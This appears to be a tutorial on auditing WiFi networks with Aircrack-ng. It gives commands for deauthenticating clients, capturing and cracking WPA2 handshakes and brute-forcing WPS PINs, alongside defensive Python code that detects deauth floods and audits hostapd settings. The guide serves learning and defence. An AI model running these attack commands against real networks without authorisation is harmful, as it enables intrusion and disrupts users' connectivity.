WiFi WPA2 Aircrack-ng Wireless Auditing

Wireless Network Auditing

May 15, 2022

WiFi security auditing guide with Aircrack-ng: WPA2 handshake capture, dictionary cracking and WPS attacks.

Legal Warning: Only audit networks you own or have explicit written permission to test.

1. Enable Monitor Mode

airmon-ng check kill
airmon-ng start wlan0   # Creates wlan0mon

2. Network Discovery

airodump-ng wlan0mon
# Shows: BSSID, Channel, Encryption, SSID, Connected clients

3. Capture WPA2 Handshake

airodump-ng -c [CH] --bssid [AP_MAC] -w capture wlan0mon
# Force deauth to capture re-handshake:
aireplay-ng -0 5 -a [AP_MAC] -c [CLIENT_MAC] wlan0mon
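The deauthentication step above is also what a wireless IDS watches for on the defender's side: a burst of deauth or disassoc frames from one transmitter is the signature of a forced re-handshake. As an added example (not from the original page and not Aircrack-ng code), the Python script below parses the 802.11 management header of raw frames, picks out deauth/disassoc frames with their reason code, and raises one alert per transmitter that sends ten or more of them inside a one-second sliding window. All MAC addresses and frames are constructed sample data built in memory; on a real sensor the bytes would come from a monitor-mode capture such as the .cap written by airodump-ng, read through a pcap library that is assumed rather than shown.

```python
import struct
from collections import deque

# 802.11 frame-control constants from the standard: type 0 = management,
# subtype 0xA = disassociation, 0xC = deauthentication.
TYPE_MGMT = 0
SUBTYPE_DISASSOC = 0x0A
SUBTYPE_DEAUTH = 0x0C

def mac_to_str(b):
    return ":".join(f"{x:02x}" for x in b)

def mac_to_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))

def parse_mgmt_frame(raw):
    """Parse the 24-byte 802.11 MAC header of a management frame.
    Returns a dict, or None for data/control frames or truncated input."""
    if len(raw) < 24:
        return None
    fc0 = raw[0]
    version = fc0 & 0x03
    ftype = (fc0 >> 2) & 0x03
    subtype = (fc0 >> 4) & 0x0F
    if version != 0 or ftype != TYPE_MGMT:
        return None
    info = {
        "subtype": subtype,
        "da": mac_to_str(raw[4:10]),      # addr1: destination
        "sa": mac_to_str(raw[10:16]),     # addr2: transmitter
        "bssid": mac_to_str(raw[16:22]),  # addr3: BSSID
    }
    # Deauth/disassoc bodies start with a 2-byte little-endian reason code.
    if subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC) and len(raw) >= 26:
        info["reason"] = struct.unpack_from("<H", raw, 24)[0]
    return info

def build_deauth(da, sa, bssid, reason=7):
    """Constructed sample deauth frame (test data only, never transmitted)."""
    fc = bytes([(SUBTYPE_DEAUTH << 4) | (TYPE_MGMT << 2), 0x00])
    duration = b"\x3a\x01"
    seq_ctrl = b"\x00\x00"
    return (fc + duration + mac_to_bytes(da) + mac_to_bytes(sa)
            + mac_to_bytes(bssid) + seq_ctrl + struct.pack("<H", reason))

def detect_deauth_flood(frames, window_s=1.0, threshold=10):
    """frames: time-ordered iterable of (timestamp_seconds, raw_frame_bytes).
    Emits one alert per transmitter that sends >= threshold deauth/disassoc
    frames inside any sliding window of window_s seconds."""
    recent = {}       # transmitter MAC -> deque of recent timestamps
    alerted = set()
    alerts = []
    for ts, raw in frames:
        info = parse_mgmt_frame(raw)
        if not info or info["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue
        q = recent.setdefault(info["sa"], deque())
        q.append(ts)
        while q and ts - q[0] > window_s:
            q.popleft()
        if len(q) >= threshold and info["sa"] not in alerted:
            alerted.add(info["sa"])
            alerts.append({"sa": info["sa"], "bssid": info["bssid"],
                           "count": len(q), "first": q[0], "last": ts})
    return alerts

# Constructed sample addresses (not real devices).
AP = "aa:bb:cc:dd:ee:01"
CLIENT = "11:22:33:44:55:66"
BROADCAST = "ff:ff:ff:ff:ff:ff"

def sample_capture():
    """Constructed capture: one legitimate deauth, then a 20-frame burst."""
    frames = [(0.0, build_deauth(CLIENT, AP, AP, reason=3))]   # client left normally
    for i in range(20):                                        # 20 frames in 0.4 s
        frames.append((5.0 + i * 0.02, build_deauth(BROADCAST, AP, AP, reason=7)))
    return frames

if __name__ == "__main__":
    for a in detect_deauth_flood(sample_capture()):
        print(f"deauth flood from {a['sa']} on {a['bssid']}: "
              f"{a['count']} frames between t={a['first']:.2f} and t={a['last']:.2f}")
```

The single deauth at t=0 (a client leaving, reason 3) never trips the detector; the burst of broadcast deauths carrying the AP's own address as transmitter does, which is exactly the pattern a spoofed deauth produces. Thresholds are a tuning choice: a busy enterprise AP legitimately deauths a few stations per second, so a production sensor would also baseline per-BSSID rates rather than use one fixed number.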

4. Crack the Handshake

# Aircrack-ng (CPU):
aircrack-ng -w rockyou.txt capture-01.cap

# Hashcat (GPU, much faster):
hcxpcapngtool -o hash.hc22000 capture-01.cap
hashcat -a 0 -m 22000 hash.hc22000 rockyou.txt

5. WPS Attack

wash -i wlan0mon              # Find WPS-enabled APs
reaver -i wlan0mon -b [AP_MAC] -vv     # Brute force PIN
reaver -i wlan0mon -b [AP_MAC] -vv -K 1  # Pixie Dust

6. Countermeasures

Measure                  Description
Use WPA3                 Most secure protocol; uses SAE instead of PSK
Long random passphrase   20+ chars; impossible to dictionary-crack
Disable WPS              The WPS 8-digit PIN is vulnerable to brute force
Guest network            Isolate IoT devices and visitors
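The countermeasures in this table map directly onto hostapd settings, so they can be checked mechanically. As an added example (not part of the original page, and not Aircrack-ng or hostapd code), the Python script below audits a hostapd.conf text for them: WPA3-SAE key management, a passphrase of at least 20 characters, WPS disabled, and client isolation for a guest network. It also checks for required Protected Management Frames (ieee80211w=2), which WPA3 mandates and which is what stops the spoofed deauth frames used in step 3 from being accepted. Both configuration samples are constructed for this example; the option names (wpa, wpa_key_mgmt, wpa_passphrase, sae_password, wps_state, ieee80211w, ap_isolate) are real hostapd options, but every value is illustrative.

```python
# Constructed sample: the kind of config the audit steps above would find weak.
WEAK_CONF = """\
interface=wlan0
ssid=HomeNet
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_passphrase=summer2022
wps_state=2
"""

# Constructed sample: WPA3-SAE, PMF required, long passphrase, WPS off, isolation on.
HARDENED_CONF = """\
interface=wlan0
ssid=HomeNet
wpa=2
wpa_key_mgmt=SAE
ieee80211w=2
sae_password=correct-horse-battery-staple-2022-orbit
wps_state=0
ap_isolate=1
"""

def parse_hostapd_conf(text):
    """Minimal key=value parser; hostapd ignores blank lines and '#' comments."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep:
            conf[key.strip()] = value.strip()
    return conf

def audit_hostapd_conf(text, min_passphrase_len=20):
    """Return a list of findings; an empty list means every check passed.
    Defaults mirror hostapd: wpa_key_mgmt=WPA-PSK, wps_state=0,
    ieee80211w=0, ap_isolate=0 when the option is absent."""
    conf = parse_hostapd_conf(text)
    findings = []
    kmgmt = conf.get("wpa_key_mgmt", "WPA-PSK").split()
    if conf.get("wpa") != "2":
        findings.append("wpa is not 2: RSN (WPA2/WPA3) not enabled")
    if "SAE" not in kmgmt:
        findings.append("not using WPA3-SAE (wpa_key_mgmt=SAE)")
    if "WPA-PSK" in kmgmt:
        findings.append("WPA-PSK enabled: captured 4-way handshake can be cracked offline")
    secret = conf.get("sae_password") or conf.get("wpa_passphrase", "")
    if len(secret) < min_passphrase_len:
        findings.append(f"passphrase shorter than {min_passphrase_len} characters")
    if conf.get("wps_state", "0") != "0":
        findings.append("WPS enabled (wps_state != 0): 8-digit PIN brute force exposure")
    if conf.get("ieee80211w", "0") != "2":
        findings.append("PMF not required (ieee80211w != 2): deauth frames are unauthenticated")
    if conf.get("ap_isolate", "0") != "1":
        findings.append("client isolation off (ap_isolate != 1): guests and IoT can reach each other")
    return findings

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        result = audit_hostapd_conf(conf)
        print(f"{name}: {'OK' if not result else ''}")
        for f in result:
            print(f"  - {f}")
```

The weak sample fails every check, which is the configuration the capture-and-crack steps on this page rely on; the hardened sample passes all of them. Mixed-mode deployments that keep `wpa_key_mgmt=WPA-PSK SAE` for old clients will still be flagged on the WPA-PSK line, which is intentional: as long as PSK is offered, the handshake remains capturable and the passphrase length is the only thing protecting it.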